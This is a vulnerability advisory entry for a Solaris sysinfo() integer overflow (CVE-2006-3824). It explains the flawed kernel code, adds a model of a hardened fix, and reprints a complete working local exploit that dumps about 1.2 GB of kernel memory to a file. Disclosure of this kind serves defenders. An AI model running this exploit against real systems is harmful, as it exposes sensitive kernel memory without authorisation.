Sun sysinfo() Kernel Memory Information Disclosure Vulnerability

Vulnerability ID: 1110675    Vulnerability type: buffer overflow
Published: 2006-07-24    Updated: 2007-06-27
CVE ID: CVE-2006-3824    CNNVD ID: CNNVD-200607-411
Platform: Solaris    CVSS score: 4.9
|Vulnerability sources
https://www.exploit-db.com/exploits/2067
https://www.securityfocus.com/bid/19104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-411
|Vulnerability details
Solaris is a commercial UNIX operating system developed and maintained by Sun. An integer overflow vulnerability exists in the file /usr/src/uts/common/syscall/systeminfo.c in Solaris and can lead to kernel information disclosure. The relevant code (systeminfo.c, lines 125-135) is as follows:

    if (kstr != NULL) {
        if ((strcnt = strlen(kstr)) >= count) {
            getcnt = count - 1;
            if (subyte(buf + count - 1, 0) < 0)
                return (set_errno(EFAULT));
        } else
            getcnt = strcnt + 1;
        if (copyout(kstr, buf, getcnt))
            return (set_errno(EFAULT));
        return (strcnt + 1);
    }

If the user-supplied variable count is 0, the function calls copyout with a length argument of -1. Because copyout interprets the length argument as an unsigned integer, a large amount of data is copied into user space, which allows an attacker to read sensitive kernel memory.
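To make the failure mode concrete, the following is an added user-space model of the length computation quoted above; it is not code from the advisory or from the Solaris source. The functions vuln_copy_len and fixed_copy_len are hypothetical names: the first mirrors the quoted logic and returns the byte count that would reach copyout, the second shows one defensive fix (rejecting a zero-length destination before the subtraction). The check used in the hardened variant is an assumption for illustration, not Sun's actual patch.

```c
/* Added example: models the systeminfo() length computation from the
 * advisory. Not the Solaris source; helper names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Mirrors the quoted kernel logic. count is the user-supplied buffer
 * length; getcnt is computed as a signed value and then handed to
 * copyout(), whose length parameter is unsigned. The cast at the return
 * models that boundary: a getcnt of -1 becomes SIZE_MAX. */
size_t vuln_copy_len(const char *kstr, long count)
{
        long strcnt = (long)strlen(kstr);
        long getcnt;

        if (strcnt >= count)
                getcnt = count - 1;   /* count == 0 yields -1 here */
        else
                getcnt = strcnt + 1;  /* string plus terminating NUL */

        return (size_t)getcnt;        /* what copyout() would be asked to copy */
}

/* Hardened variant (assumed fix, for illustration): a destination length
 * of zero or less is rejected up front, so the subtraction can never go
 * negative. On rejection it returns 0 and sets *err to -1, standing in
 * for set_errno(EINVAL) in a real kernel path. */
size_t fixed_copy_len(const char *kstr, long count, int *err)
{
        long strcnt = (long)strlen(kstr);
        long getcnt;

        *err = 0;
        if (count <= 0) {
                *err = -1;
                return 0;
        }
        if (strcnt >= count)
                getcnt = count - 1;
        else
                getcnt = strcnt + 1;

        return (size_t)getcnt;
}

int main(void)
{
        int err;
        /* Constructed sample: a short kernel string and a zero-length
         * user buffer, the case described in the advisory. */
        const char *kstr = "SunOS";

        printf("unpatched, count=0:  copyout length = %zu\n",
               vuln_copy_len(kstr, 0));
        printf("unpatched, count=16: copyout length = %zu\n",
               vuln_copy_len(kstr, 16));
        printf("hardened,  count=0:  copyout length = %zu, err = %d\n",
               fixed_copy_len(kstr, 0, &err), err);
        return 0;
}
```

The unpatched path turns a zero-length request into a copy of SIZE_MAX bytes, which is exactly the condition a detection rule or code audit should look for: a signed length derived from user input crossing into an unsigned copy routine without a lower-bound check.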
|Exploit
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define bufsize 1294967293

int main(int argc, char *argv[])
{
        int fd;
        ssize_t out;
        char *output_buffer;

        if (argc < 2) {
                printf("[ Use with <filepath>\n");
                exit(1);
        }
        printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
        output_buffer = malloc(bufsize);
        if (output_buffer == NULL) {
                perror("malloc");
                exit(1);
        }
        memset(output_buffer, 0, bufsize);
        /* count of 0 drives the count-1 computation negative in the kernel */
        sysinfo(SI_SYSNAME, output_buffer, 0);
        fd = open(argv[1], O_RDWR | O_CREAT, 0700);
        if (fd != -1) {
                out = write(fd, output_buffer, bufsize);
                printf("[ Wrote %ld bytes to %s\n", (long)out, argv[1]);
                close(fd);
        }
        exit(0);
}

// milw0rm.com [2006-07-24]
|Affected products
Sun Solaris 10_x86, Sun Solaris 10, Avaya Interactive Response
|References

Source: BID
Name: 19104
Link: http://www.securityfocus.com/bid/19104
Source: MISC
Link: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
Source: XF
Name: solaris-systeminfo-overflow(27901)
Link: http://xforce.iss.net/xforce/xfdb/27901
Source: BUGTRAQ
Name: 20060724 Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/440986/100/100/threaded
Source: BUGTRAQ
Name: 20060721 Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/440849/100/100/threaded
Source: VUPEN
Name: ADV-2006-2936
Link: http://www.frsirt.com/english/advisories/2006/2936
Source: SECTRACK
Name: 1016555
Link: http://securitytracker.com/id?1016555
Source: SECUNIA
Name: 21148
Link: http://secunia.com/advisories/21148